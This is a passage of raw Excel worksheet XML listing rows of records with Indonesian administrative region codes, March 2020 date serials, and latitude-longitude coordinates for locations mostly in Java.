      <c r="C1951" t="s">
        <v>6514</v>
      </c>
      <c r="D1951" t="s">
        <v>2648</v>
      </c>
      <c r="E1951" t="s">
        <v>23</v>
      </c>
      <c r="G1951" t="s">
        <v>6520</v>
      </c>
      <c r="H1951" t="s">
        <v>26</v>
      </c>
      <c r="J1951" t="s">
        <v>5747</v>
      </c>
      <c r="L1951" t="s">
        <v>6521</v>
      </c>
      <c r="M1951">
        <v>3172050002</v>
      </c>
      <c r="N1951">
        <v>3172050</v>
      </c>
      <c r="O1951">
        <v>3172</v>
      </c>
      <c r="P1951">
        <v>31</v>
      </c>
      <c r="Q1951" t="s">
        <v>5749</v>
      </c>
      <c r="R1951" t="s">
        <v>358</v>
      </c>
      <c r="S1951" t="s">
        <v>49</v>
      </c>
      <c r="T1951" t="s">
        <v>33</v>
      </c>
      <c r="U1951" s="5">
        <v>10685638</v>
      </c>
      <c r="V1951" s="5" t="s">
        <v>16187</v>
      </c>
      <c r="W1951" s="5">
        <v>-629194</v>
      </c>
      <c r="X1951" t="s">
        <v>19942</v>
      </c>
      <c r="Y1951" t="str">
        <f t="shared" si="30"/>
        <v>-6.29194,106.85638</v>
      </c>
    </row>
    <row r="1952" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1952">
        <v>173481</v>
      </c>
      <c r="B1952" s="1">
        <v>43894</v>
      </c>
      <c r="C1952" t="s">
        <v>6514</v>
      </c>
      <c r="D1952" t="s">
        <v>2648</v>
      </c>
      <c r="E1952" t="s">
        <v>23</v>
      </c>
      <c r="G1952" t="s">
        <v>6522</v>
      </c>
      <c r="H1952" t="s">
        <v>26</v>
      </c>
      <c r="J1952" t="s">
        <v>5747</v>
      </c>
      <c r="L1952" t="s">
        <v>6523</v>
      </c>
      <c r="M1952">
        <v>3172050002</v>
      </c>
      <c r="N1952">
        <v>3172050</v>
      </c>
      <c r="O1952">
        <v>3172</v>
      </c>
      <c r="P1952">
        <v>31</v>
      </c>
      <c r="Q1952" t="s">
        <v>5749</v>
      </c>
      <c r="R1952" t="s">
        <v>358</v>
      </c>
      <c r="S1952" t="s">
        <v>49</v>
      </c>
      <c r="T1952" t="s">
        <v>33</v>
      </c>
      <c r="U1952" s="5">
        <v>10685642</v>
      </c>
      <c r="V1952" s="5" t="s">
        <v>16188</v>
      </c>
      <c r="W1952" s="5">
        <v>-629195</v>
      </c>
      <c r="X1952" t="s">
        <v>19943</v>
      </c>
      <c r="Y1952" t="str">
        <f t="shared" si="30"/>
        <v>-6.29195,106.85642</v>
      </c>
    </row>
    <row r="1953" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1953">
        <v>173490</v>
      </c>
      <c r="B1953" s="1">
        <v>43894</v>
      </c>
      <c r="C1953" t="s">
        <v>6449</v>
      </c>
      <c r="D1953" t="s">
        <v>22</v>
      </c>
      <c r="E1953" t="s">
        <v>23</v>
      </c>
      <c r="F1953" s="3" t="s">
        <v>6524</v>
      </c>
      <c r="G1953" t="s">
        <v>6525</v>
      </c>
      <c r="H1953" t="s">
        <v>26</v>
      </c>
      <c r="I1953" t="s">
        <v>1909</v>
      </c>
      <c r="J1953" t="s">
        <v>5936</v>
      </c>
      <c r="L1953" t="s">
        <v>6526</v>
      </c>
      <c r="M1953">
        <v>3174030003</v>
      </c>
      <c r="N1953">
        <v>3174030</v>
      </c>
      <c r="O1953">
        <v>3174</v>
      </c>
      <c r="P1953">
        <v>31</v>
      </c>
      <c r="Q1953" t="s">
        <v>1486</v>
      </c>
      <c r="R1953" t="s">
        <v>1487</v>
      </c>
      <c r="S1953" t="s">
        <v>32</v>
      </c>
      <c r="T1953" t="s">
        <v>33</v>
      </c>
      <c r="U1953" s="5">
        <v>10678231</v>
      </c>
      <c r="V1953" s="5" t="s">
        <v>16189</v>
      </c>
      <c r="W1953" s="5">
        <v>-619163</v>
      </c>
      <c r="X1953" t="s">
        <v>19944</v>
      </c>
      <c r="Y1953" t="str">
        <f t="shared" si="30"/>
        <v>-6.19163,106.78231</v>
      </c>
    </row>
    <row r="1954" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1954">
        <v>173491</v>
      </c>
      <c r="B1954" s="1">
        <v>43894</v>
      </c>
      <c r="C1954" t="s">
        <v>6527</v>
      </c>
      <c r="D1954" t="s">
        <v>22</v>
      </c>
      <c r="E1954" t="s">
        <v>23</v>
      </c>
      <c r="F1954" t="s">
        <v>6528</v>
      </c>
      <c r="G1954" t="s">
        <v>6529</v>
      </c>
      <c r="H1954" t="s">
        <v>26</v>
      </c>
      <c r="I1954" t="s">
        <v>1909</v>
      </c>
      <c r="J1954" t="s">
        <v>2627</v>
      </c>
      <c r="M1954">
        <v>3274040005</v>
      </c>
      <c r="N1954">
        <v>3274040</v>
      </c>
      <c r="O1954">
        <v>3274</v>
      </c>
      <c r="P1954">
        <v>32</v>
      </c>
      <c r="Q1954" t="s">
        <v>6530</v>
      </c>
      <c r="R1954" t="s">
        <v>6531</v>
      </c>
      <c r="S1954" t="s">
        <v>6532</v>
      </c>
      <c r="T1954" t="s">
        <v>42</v>
      </c>
      <c r="U1954" s="5">
        <v>10855154</v>
      </c>
      <c r="V1954" s="5" t="s">
        <v>16190</v>
      </c>
      <c r="W1954" s="5">
        <v>-671776</v>
      </c>
      <c r="X1954" t="s">
        <v>19945</v>
      </c>
      <c r="Y1954" t="str">
        <f t="shared" si="30"/>
        <v>-6.71776,108.55154</v>
      </c>
    </row>
    <row r="1955" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1955">
        <v>173492</v>
      </c>
      <c r="B1955" s="1">
        <v>43894</v>
      </c>
      <c r="C1955" t="s">
        <v>6476</v>
      </c>
      <c r="D1955" t="s">
        <v>2648</v>
      </c>
      <c r="E1955" t="s">
        <v>23</v>
      </c>
      <c r="G1955" t="s">
        <v>6533</v>
      </c>
      <c r="H1955" t="s">
        <v>26</v>
      </c>
      <c r="J1955" t="s">
        <v>6408</v>
      </c>
      <c r="L1955" t="s">
        <v>6534</v>
      </c>
      <c r="M1955">
        <v>3174080001</v>
      </c>
      <c r="N1955">
        <v>3174080</v>
      </c>
      <c r="O1955">
        <v>3174</v>
      </c>
      <c r="P1955">
        <v>31</v>
      </c>
      <c r="Q1955" t="s">
        <v>694</v>
      </c>
      <c r="R1955" t="s">
        <v>695</v>
      </c>
      <c r="S1955" t="s">
        <v>32</v>
      </c>
      <c r="T1955" t="s">
        <v>33</v>
      </c>
      <c r="U1955" s="5">
        <v>10670485</v>
      </c>
      <c r="V1955" s="5" t="s">
        <v>16191</v>
      </c>
      <c r="W1955" s="5">
        <v>-616416</v>
      </c>
      <c r="X1955" t="s">
        <v>19946</v>
      </c>
      <c r="Y1955" t="str">
        <f t="shared" si="30"/>
        <v>-6.16416,106.70485</v>
      </c>
    </row>
    <row r="1956" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1956">
        <v>173627</v>
      </c>
      <c r="B1956" s="1">
        <v>43894</v>
      </c>
      <c r="C1956" t="s">
        <v>6535</v>
      </c>
      <c r="D1956" t="s">
        <v>2648</v>
      </c>
      <c r="E1956" t="s">
        <v>23</v>
      </c>
      <c r="G1956" t="s">
        <v>6536</v>
      </c>
      <c r="H1956" t="s">
        <v>26</v>
      </c>
      <c r="J1956" t="s">
        <v>6537</v>
      </c>
      <c r="L1956" t="s">
        <v>6538</v>
      </c>
      <c r="M1956">
        <v>3172080005</v>
      </c>
      <c r="N1956">
        <v>3172080</v>
      </c>
      <c r="O1956">
        <v>3172</v>
      </c>
      <c r="P1956">
        <v>31</v>
      </c>
      <c r="Q1956" t="s">
        <v>140</v>
      </c>
      <c r="R1956" t="s">
        <v>141</v>
      </c>
      <c r="S1956" t="s">
        <v>49</v>
      </c>
      <c r="T1956" t="s">
        <v>33</v>
      </c>
      <c r="U1956" s="5">
        <v>10694817</v>
      </c>
      <c r="V1956" s="5" t="s">
        <v>16192</v>
      </c>
      <c r="W1956" s="5">
        <v>-617318</v>
      </c>
      <c r="X1956" t="s">
        <v>19947</v>
      </c>
      <c r="Y1956" t="str">
        <f t="shared" si="30"/>
        <v>-6.17318,106.94817</v>
      </c>
    </row>
    <row r="1957" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1957">
        <v>173652</v>
      </c>
      <c r="B1957" s="1">
        <v>43895</v>
      </c>
      <c r="C1957" t="s">
        <v>6514</v>
      </c>
      <c r="D1957" t="s">
        <v>22</v>
      </c>
      <c r="E1957" t="s">
        <v>23</v>
      </c>
      <c r="F1957" t="s">
        <v>6539</v>
      </c>
      <c r="G1957" t="s">
        <v>6540</v>
      </c>
      <c r="H1957" t="s">
        <v>26</v>
      </c>
      <c r="I1957" t="s">
        <v>166</v>
      </c>
      <c r="J1957" t="s">
        <v>2608</v>
      </c>
      <c r="L1957" t="s">
        <v>6541</v>
      </c>
      <c r="M1957">
        <v>3301180016</v>
      </c>
      <c r="N1957">
        <v>3301180</v>
      </c>
      <c r="O1957">
        <v>3301</v>
      </c>
      <c r="P1957">
        <v>33</v>
      </c>
      <c r="Q1957" t="s">
        <v>6542</v>
      </c>
      <c r="R1957" t="s">
        <v>6543</v>
      </c>
      <c r="S1957" t="s">
        <v>2642</v>
      </c>
      <c r="T1957" t="s">
        <v>1134</v>
      </c>
      <c r="U1957" s="5">
        <v>10925743</v>
      </c>
      <c r="V1957" s="5" t="s">
        <v>16193</v>
      </c>
      <c r="W1957" s="5">
        <v>-760376</v>
      </c>
      <c r="X1957" t="s">
        <v>19948</v>
      </c>
      <c r="Y1957" t="str">
        <f t="shared" si="30"/>
        <v>-7.60376,109.25743</v>
      </c>
    </row>
    <row r="1958" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1958">
        <v>173666</v>
      </c>
      <c r="B1958" s="1">
        <v>43895</v>
      </c>
      <c r="C1958" t="s">
        <v>6514</v>
      </c>
      <c r="D1958" t="s">
        <v>85</v>
      </c>
      <c r="E1958" t="s">
        <v>23</v>
      </c>
      <c r="F1958" t="s">
        <v>6544</v>
      </c>
      <c r="G1958" t="s">
        <v>6545</v>
      </c>
      <c r="H1958" t="s">
        <v>26</v>
      </c>
      <c r="J1958" t="s">
        <v>2615</v>
      </c>
      <c r="K1958" t="s">
        <v>6546</v>
      </c>
      <c r="L1958" t="s">
        <v>6547</v>
      </c>
      <c r="M1958">
        <v>3404120001</v>
      </c>
      <c r="N1958">
        <v>3404120</v>
      </c>
      <c r="O1958">
        <v>3404</v>
      </c>
      <c r="P1958">
        <v>34</v>
      </c>
      <c r="Q1958" t="s">
        <v>6505</v>
      </c>
      <c r="R1958" t="s">
        <v>6506</v>
      </c>
      <c r="S1958" t="s">
        <v>1855</v>
      </c>
      <c r="T1958" t="s">
        <v>1856</v>
      </c>
      <c r="U1958" s="5">
        <v>11037277</v>
      </c>
      <c r="V1958" s="5" t="s">
        <v>16194</v>
      </c>
      <c r="W1958" s="5">
        <v>-774764</v>
      </c>
      <c r="X1958" t="s">
        <v>19949</v>
      </c>
      <c r="Y1958" t="str">
        <f t="shared" si="30"/>
        <v>-7.74764,110.37277</v>
      </c>
    </row>
    <row r="1959" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1959">
        <v>173667</v>
      </c>
      <c r="B1959" s="1">
        <v>43895</v>
      </c>
      <c r="C1959" t="s">
        <v>6481</v>
      </c>
      <c r="D1959" t="s">
        <v>22</v>
      </c>
      <c r="E1959" t="s">
        <v>23</v>
      </c>
      <c r="F1959" t="s">
        <v>6548</v>
      </c>
      <c r="G1959" t="s">
        <v>6549</v>
      </c>
      <c r="H1959" t="s">
        <v>26</v>
      </c>
      <c r="I1959" t="s">
        <v>1263</v>
      </c>
      <c r="J1959" t="s">
        <v>6550</v>
      </c>
      <c r="L1959" t="s">
        <v>6551</v>
      </c>
      <c r="M1959">
        <v>3374150005</v>
      </c>
      <c r="N1959">
        <v>3374150</v>
      </c>
      <c r="O1959">
        <v>3374</v>
      </c>
      <c r="P1959">
        <v>33</v>
      </c>
      <c r="Q1959" t="s">
        <v>6552</v>
      </c>
      <c r="R1959" t="s">
        <v>6553</v>
      </c>
      <c r="S1959" t="s">
        <v>1334</v>
      </c>
      <c r="T1959" t="s">
        <v>1134</v>
      </c>
      <c r="U1959" s="5">
        <v>11030891</v>
      </c>
      <c r="V1959" s="5" t="s">
        <v>16195</v>
      </c>
      <c r="W1959" s="5">
        <v>-696996</v>
      </c>
      <c r="X1959" t="s">
        <v>19950</v>
      </c>
      <c r="Y1959" t="str">
        <f t="shared" si="30"/>
        <v>-6.96996,110.30891</v>
      </c>
    </row>
    <row r="1960" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1960">
        <v>173668</v>
      </c>
      <c r="B1960" s="1">
        <v>43896</v>
      </c>
      <c r="C1960" t="s">
        <v>6476</v>
      </c>
      <c r="D1960" t="s">
        <v>22</v>
      </c>
      <c r="E1960" t="s">
        <v>23</v>
      </c>
      <c r="F1960" t="s">
        <v>6554</v>
      </c>
      <c r="G1960" t="s">
        <v>6555</v>
      </c>
      <c r="H1960" t="s">
        <v>26</v>
      </c>
      <c r="I1960" t="s">
        <v>1991</v>
      </c>
      <c r="J1960" t="s">
        <v>2622</v>
      </c>
      <c r="L1960" t="s">
        <v>6556</v>
      </c>
      <c r="M1960">
        <v>3578080004</v>
      </c>
      <c r="N1960">
        <v>3578080</v>
      </c>
      <c r="O1960">
        <v>3578</v>
      </c>
      <c r="P1960">
        <v>35</v>
      </c>
      <c r="Q1960" t="s">
        <v>3020</v>
      </c>
      <c r="R1960" t="s">
        <v>3021</v>
      </c>
      <c r="S1960" t="s">
        <v>1346</v>
      </c>
      <c r="T1960" t="s">
        <v>1221</v>
      </c>
      <c r="U1960" s="5">
        <v>11279377</v>
      </c>
      <c r="V1960" s="5" t="s">
        <v>16196</v>
      </c>
      <c r="W1960" s="5">
        <v>-728947</v>
      </c>
      <c r="X1960" t="s">
        <v>19951</v>
      </c>
      <c r="Y1960" t="str">
        <f t="shared" si="30"/>
        <v>-7.28947,112.79377</v>
      </c>
    </row>
    <row r="1961" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1961">
        <v>173711</v>
      </c>
      <c r="B1961" s="1">
        <v>43898</v>
      </c>
      <c r="C1961" t="s">
        <v>6481</v>
      </c>
      <c r="D1961" t="s">
        <v>85</v>
      </c>
      <c r="E1961" t="s">
        <v>23</v>
      </c>
      <c r="F1961" t="s">
        <v>6557</v>
      </c>
      <c r="G1961" t="s">
        <v>6558</v>
      </c>
      <c r="H1961" t="s">
        <v>26</v>
      </c>
      <c r="J1961" t="s">
        <v>2627</v>
      </c>
      <c r="K1961" t="s">
        <v>6559</v>
      </c>
      <c r="L1961" t="s">
        <v>6560</v>
      </c>
      <c r="M1961">
        <v>3207210011</v>
      </c>
      <c r="N1961">
        <v>3207210</v>
      </c>
      <c r="O1961">
        <v>3207</v>
      </c>
      <c r="P1961">
        <v>32</v>
      </c>
      <c r="Q1961" t="s">
        <v>6561</v>
      </c>
      <c r="R1961" t="s">
        <v>6562</v>
      </c>
      <c r="S1961" t="s">
        <v>6562</v>
      </c>
      <c r="T1961" t="s">
        <v>42</v>
      </c>
      <c r="U1961" s="5">
        <v>10836326</v>
      </c>
      <c r="V1961" s="5" t="s">
        <v>16197</v>
      </c>
      <c r="W1961" s="5">
        <v>-732525</v>
      </c>
      <c r="X1961" t="s">
        <v>19952</v>
      </c>
      <c r="Y1961" t="str">
        <f t="shared" si="30"/>
        <v>-7.32525,108.36326</v>
      </c>
    </row>
    <row r="1962" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1962">
        <v>173712</v>
      </c>
      <c r="B1962" s="1">
        <v>43899</v>
      </c>
      <c r="C1962" t="s">
        <v>6527</v>
      </c>
      <c r="D1962" t="s">
        <v>2648</v>
      </c>
      <c r="E1962" t="s">
        <v>23</v>
      </c>
      <c r="G1962" t="s">
        <v>6563</v>
      </c>
      <c r="H1962" t="s">
        <v>26</v>
      </c>
      <c r="J1962" t="s">
        <v>6564</v>
      </c>
      <c r="L1962" t="s">
        <v>6565</v>
      </c>
      <c r="M1962">
        <v>3173040002</v>
      </c>
      <c r="N1962">
        <v>3173040</v>
      </c>
      <c r="O1962">
        <v>3173</v>
      </c>
      <c r="P1962">
        <v>31</v>
      </c>
      <c r="Q1962" t="s">
        <v>3054</v>
      </c>
      <c r="R1962" t="s">
        <v>1598</v>
      </c>
      <c r="S1962" t="s">
        <v>62</v>
      </c>
      <c r="T1962" t="s">
        <v>33</v>
      </c>
      <c r="U1962" s="5">
        <v>10685786</v>
      </c>
      <c r="V1962" s="5" t="s">
        <v>15526</v>
      </c>
      <c r="W1962" s="5">
        <v>-617968</v>
      </c>
      <c r="X1962" t="s">
        <v>19953</v>
      </c>
      <c r="Y1962" t="str">
        <f t="shared" si="30"/>
        <v>-6.17968,106.85786</v>
      </c>
    </row>
    <row r="1963" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1963">
        <v>173718</v>
      </c>
      <c r="B1963" s="1">
        <v>43900</v>
      </c>
      <c r="C1963" t="s">
        <v>6514</v>
      </c>
      <c r="D1963" t="s">
        <v>2648</v>
      </c>
      <c r="E1963" t="s">
        <v>23</v>
      </c>
      <c r="G1963" t="s">
        <v>6566</v>
      </c>
      <c r="H1963" t="s">
        <v>26</v>
      </c>
      <c r="J1963" t="s">
        <v>6567</v>
      </c>
      <c r="L1963" t="s">
        <v>6568</v>
      </c>
      <c r="M1963">
        <v>3174040004</v>
      </c>
      <c r="N1963">
        <v>3174040</v>
      </c>
      <c r="O1963">
        <v>3174</v>
      </c>
      <c r="P1963">
        <v>31</v>
      </c>
      <c r="Q1963" t="s">
        <v>5091</v>
      </c>
      <c r="R1963" t="s">
        <v>377</v>
      </c>
      <c r="S1963" t="s">
        <v>32</v>
      </c>
      <c r="T1963" t="s">
        <v>33</v>
      </c>
      <c r="U1963" s="5">
        <v>10678894</v>
      </c>
      <c r="V1963" s="5" t="s">
        <v>16198</v>
      </c>
      <c r="W1963" s="5">
        <v>-616610</v>
      </c>
      <c r="X1963" t="s">
        <v>19954</v>
      </c>
      <c r="Y1963" t="str">
        <f t="shared" si="30"/>
        <v>-6.16610,106.78894</v>
      </c>
    </row>
    <row r="1964" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1964">
        <v>173725</v>
      </c>
      <c r="B1964" s="1">
        <v>43900</v>
      </c>
      <c r="C1964" t="s">
        <v>6449</v>
      </c>
      <c r="D1964" t="s">
        <v>22</v>
      </c>
      <c r="E1964" t="s">
        <v>23</v>
      </c>
      <c r="F1964" t="s">
        <v>6569</v>
      </c>
      <c r="G1964" t="s">
        <v>6570</v>
      </c>
      <c r="H1964" t="s">
        <v>26</v>
      </c>
      <c r="I1964" t="s">
        <v>628</v>
      </c>
      <c r="J1964" t="s">
        <v>3006</v>
      </c>
      <c r="L1964" t="s">
        <v>6571</v>
      </c>
      <c r="M1964">
        <v>3173020001</v>
      </c>
      <c r="N1964">
        <v>3173020</v>
      </c>
      <c r="O1964">
        <v>3173</v>
      </c>
      <c r="P1964">
        <v>31</v>
      </c>
      <c r="Q1964" t="s">
        <v>179</v>
      </c>
      <c r="R1964" t="s">
        <v>179</v>
      </c>
      <c r="S1964" t="s">
        <v>62</v>
      </c>
      <c r="T1964" t="s">
        <v>33</v>
      </c>
      <c r="U1964" s="5">
        <v>10683594</v>
      </c>
      <c r="V1964" s="5" t="s">
        <v>16199</v>
      </c>
      <c r="W1964" s="5">
        <v>-620518</v>
      </c>
      <c r="X1964" t="s">
        <v>19020</v>
      </c>
      <c r="Y1964" t="str">
        <f t="shared" si="30"/>
        <v>-6.20518,106.83594</v>
      </c>
    </row>
    <row r="1965" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1965">
        <v>173727</v>
      </c>
      <c r="B1965" s="1">
        <v>43902</v>
      </c>
      <c r="C1965" t="s">
        <v>6449</v>
      </c>
      <c r="D1965" t="s">
        <v>22</v>
      </c>
      <c r="E1965" t="s">
        <v>23</v>
      </c>
      <c r="F1965" t="s">
        <v>6572</v>
      </c>
      <c r="G1965" t="s">
        <v>6573</v>
      </c>
      <c r="H1965" t="s">
        <v>26</v>
      </c>
      <c r="I1965" t="s">
        <v>386</v>
      </c>
      <c r="J1965" t="s">
        <v>6498</v>
      </c>
      <c r="L1965" t="s">
        <v>6574</v>
      </c>
      <c r="M1965">
        <v>7502031006</v>
      </c>
      <c r="N1965">
        <v>7502031</v>
      </c>
      <c r="O1965">
        <v>7502</v>
      </c>
      <c r="P1965">
        <v>75</v>
      </c>
      <c r="Q1965" t="s">
        <v>6575</v>
      </c>
      <c r="R1965" t="s">
        <v>6576</v>
      </c>
      <c r="S1965" t="s">
        <v>6501</v>
      </c>
      <c r="T1965" t="s">
        <v>6501</v>
      </c>
      <c r="U1965" s="5">
        <v>12269570</v>
      </c>
      <c r="V1965" s="5" t="s">
        <v>16200</v>
      </c>
      <c r="W1965" s="5">
        <v>65670</v>
      </c>
      <c r="X1965" s="5" t="s">
        <v>14431</v>
      </c>
      <c r="Y1965" t="str">
        <f t="shared" si="30"/>
        <v>0.65670,122.69570</v>
      </c>
    </row>
    <row r="1966" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1966">
        <v>173728</v>
      </c>
      <c r="B1966" s="1">
        <v>43903</v>
      </c>
      <c r="C1966" t="s">
        <v>6527</v>
      </c>
      <c r="D1966" t="s">
        <v>2648</v>
      </c>
      <c r="E1966" t="s">
        <v>23</v>
      </c>
      <c r="G1966" t="s">
        <v>6577</v>
      </c>
      <c r="H1966" t="s">
        <v>26</v>
      </c>
      <c r="J1966" t="s">
        <v>2676</v>
      </c>
      <c r="L1966" t="s">
        <v>6578</v>
      </c>
      <c r="M1966">
        <v>3174080005</v>
      </c>
      <c r="N1966">
        <v>3174080</v>
      </c>
      <c r="O1966">
        <v>3174</v>
      </c>
      <c r="P1966">
        <v>31</v>
      </c>
      <c r="Q1966" t="s">
        <v>2663</v>
      </c>
      <c r="R1966" t="s">
        <v>695</v>
      </c>
      <c r="S1966" t="s">
        <v>32</v>
      </c>
      <c r="T1966" t="s">
        <v>33</v>
      </c>
      <c r="U1966" s="5">
        <v>10669996</v>
      </c>
      <c r="V1966" s="5" t="s">
        <v>16201</v>
      </c>
      <c r="W1966" s="5">
        <v>-609740</v>
      </c>
      <c r="X1966" t="s">
        <v>19955</v>
      </c>
      <c r="Y1966" t="str">
        <f t="shared" si="30"/>
        <v>-6.09740,106.69996</v>
      </c>
    </row>
    <row r="1967" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1967">
        <v>173733</v>
      </c>
      <c r="B1967" s="1">
        <v>43905</v>
      </c>
      <c r="C1967" t="s">
        <v>6481</v>
      </c>
      <c r="D1967" t="s">
        <v>2648</v>
      </c>
      <c r="E1967" t="s">
        <v>23</v>
      </c>
      <c r="G1967" t="s">
        <v>6579</v>
      </c>
      <c r="H1967" t="s">
        <v>26</v>
      </c>
      <c r="J1967" t="s">
        <v>6580</v>
      </c>
      <c r="L1967" t="s">
        <v>6581</v>
      </c>
      <c r="M1967">
        <v>3171090002</v>
      </c>
      <c r="N1967">
        <v>3171090</v>
      </c>
      <c r="O1967">
        <v>3171</v>
      </c>
      <c r="P1967">
        <v>31</v>
      </c>
      <c r="Q1967" t="s">
        <v>6582</v>
      </c>
      <c r="R1967" t="s">
        <v>347</v>
      </c>
      <c r="S1967" t="s">
        <v>108</v>
      </c>
      <c r="T1967" t="s">
        <v>33</v>
      </c>
      <c r="U1967" s="5">
        <v>10684640</v>
      </c>
      <c r="V1967" s="5" t="s">
        <v>16202</v>
      </c>
      <c r="W1967" s="5">
        <v>-623165</v>
      </c>
      <c r="X1967" t="s">
        <v>19956</v>
      </c>
      <c r="Y1967" t="str">
        <f t="shared" si="30"/>
        <v>-6.23165,106.84640</v>
      </c>
    </row>
    <row r="1968" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1968">
        <v>173734</v>
      </c>
      <c r="B1968" s="1">
        <v>43905</v>
      </c>
      <c r="C1968" t="s">
        <v>6481</v>
      </c>
      <c r="D1968" t="s">
        <v>2648</v>
      </c>
      <c r="E1968" t="s">
        <v>23</v>
      </c>
      <c r="G1968" t="s">
        <v>6583</v>
      </c>
      <c r="H1968" t="s">
        <v>26</v>
      </c>
      <c r="J1968" t="s">
        <v>6584</v>
      </c>
      <c r="L1968" t="s">
        <v>6585</v>
      </c>
      <c r="M1968">
        <v>3171100006</v>
      </c>
      <c r="N1968">
        <v>3171100</v>
      </c>
      <c r="O1968">
        <v>3171</v>
      </c>
      <c r="P1968">
        <v>31</v>
      </c>
      <c r="Q1968" t="s">
        <v>1121</v>
      </c>
      <c r="R1968" t="s">
        <v>107</v>
      </c>
      <c r="S1968" t="s">
        <v>108</v>
      </c>
      <c r="T1968" t="s">
        <v>33</v>
      </c>
      <c r="U1968" s="5">
        <v>10683826</v>
      </c>
      <c r="V1968" s="5" t="s">
        <v>16203</v>
      </c>
      <c r="W1968" s="5">
        <v>-620913</v>
      </c>
      <c r="X1968" t="s">
        <v>19957</v>
      </c>
      <c r="Y1968" t="str">
        <f t="shared" si="30"/>
        <v>-6.20913,106.83826</v>
      </c>
    </row>
    <row r="1969" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1969">
        <v>173774</v>
      </c>
      <c r="B1969" s="1">
        <v>43905</v>
      </c>
      <c r="C1969" t="s">
        <v>6454</v>
      </c>
      <c r="D1969" t="s">
        <v>85</v>
      </c>
      <c r="E1969" t="s">
        <v>23</v>
      </c>
      <c r="F1969" t="s">
        <v>6586</v>
      </c>
      <c r="G1969" t="s">
        <v>6587</v>
      </c>
      <c r="H1969" t="s">
        <v>26</v>
      </c>
      <c r="J1969" t="s">
        <v>2627</v>
      </c>
      <c r="K1969" t="s">
        <v>6588</v>
      </c>
      <c r="M1969">
        <v>3207150011</v>
      </c>
      <c r="N1969">
        <v>3207150</v>
      </c>
      <c r="O1969">
        <v>3207</v>
      </c>
      <c r="P1969">
        <v>32</v>
      </c>
      <c r="Q1969" t="s">
        <v>2056</v>
      </c>
      <c r="R1969" t="s">
        <v>6589</v>
      </c>
      <c r="S1969" t="s">
        <v>6562</v>
      </c>
      <c r="T1969" t="s">
        <v>42</v>
      </c>
      <c r="U1969" s="5">
        <v>10841972</v>
      </c>
      <c r="V1969" s="5" t="s">
        <v>16204</v>
      </c>
      <c r="W1969" s="5">
        <v>-730321</v>
      </c>
      <c r="X1969" t="s">
        <v>19958</v>
      </c>
      <c r="Y1969" t="str">
        <f t="shared" si="30"/>
        <v>-7.30321,108.41972</v>
      </c>
    </row>
    <row r="1970" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1970">
        <v>173787</v>
      </c>
      <c r="B1970" s="1">
        <v>43905</v>
      </c>
      <c r="C1970" t="s">
        <v>6454</v>
      </c>
      <c r="D1970" t="s">
        <v>85</v>
      </c>
      <c r="E1970" t="s">
        <v>23</v>
      </c>
      <c r="F1970" t="s">
        <v>6590</v>
      </c>
      <c r="G1970" t="s">
        <v>6591</v>
      </c>
      <c r="H1970" t="s">
        <v>26</v>
      </c>
      <c r="J1970" t="s">
        <v>2627</v>
      </c>
      <c r="K1970" t="s">
        <v>6592</v>
      </c>
      <c r="M1970">
        <v>3207150011</v>
      </c>
      <c r="N1970">
        <v>3207150</v>
      </c>
      <c r="O1970">
        <v>3207</v>
      </c>
      <c r="P1970">
        <v>32</v>
      </c>
      <c r="Q1970" t="s">
        <v>2056</v>
      </c>
      <c r="R1970" t="s">
        <v>6589</v>
      </c>
      <c r="S1970" t="s">
        <v>6562</v>
      </c>
      <c r="T1970" t="s">
        <v>42</v>
      </c>
      <c r="U1970" s="5">
        <v>10842148</v>
      </c>
      <c r="V1970" s="5" t="s">
        <v>16205</v>
      </c>
      <c r="W1970" s="5">
        <v>-730603</v>
      </c>
      <c r="X1970" t="s">
        <v>19959</v>
      </c>
      <c r="Y1970" t="str">
        <f t="shared" si="30"/>
        <v>-7.30603,108.42148</v>
      </c>
    </row>
    <row r="1971" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1971">
        <v>174256</v>
      </c>
      <c r="B1971" s="1">
        <v>43906</v>
      </c>
      <c r="C1971" t="s">
        <v>6476</v>
      </c>
      <c r="D1971" t="s">
        <v>22</v>
      </c>
      <c r="E1971" t="s">
        <v>23</v>
      </c>
      <c r="F1971" t="s">
        <v>6593</v>
      </c>
      <c r="G1971" t="s">
        <v>6594</v>
      </c>
      <c r="H1971" t="s">
        <v>26</v>
      </c>
      <c r="I1971" t="s">
        <v>523</v>
      </c>
      <c r="J1971" t="s">
        <v>550</v>
      </c>
      <c r="L1971" t="s">
        <v>6595</v>
      </c>
      <c r="M1971">
        <v>3172040003</v>
      </c>
      <c r="N1971">
        <v>3172040</v>
      </c>
      <c r="O1971">
        <v>3172</v>
      </c>
      <c r="P1971">
        <v>31</v>
      </c>
      <c r="Q1971" t="s">
        <v>552</v>
      </c>
      <c r="R1971" t="s">
        <v>281</v>
      </c>
      <c r="S1971" t="s">
        <v>49</v>
      </c>
      <c r="T1971" t="s">
        <v>33</v>
      </c>
      <c r="U1971" s="5">
        <v>10687768</v>
      </c>
      <c r="V1971" s="5" t="s">
        <v>16206</v>
      </c>
      <c r="W1971" s="5">
        <v>-625059</v>
      </c>
      <c r="X1971" t="s">
        <v>19960</v>
      </c>
      <c r="Y1971" t="str">
        <f t="shared" si="30"/>
        <v>-6.25059,106.87768</v>
      </c>
    </row>
    <row r="1972" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1972">
        <v>174273</v>
      </c>
      <c r="B1972" s="1">
        <v>43906</v>
      </c>
      <c r="C1972" t="s">
        <v>6476</v>
      </c>
      <c r="D1972" t="s">
        <v>2648</v>
      </c>
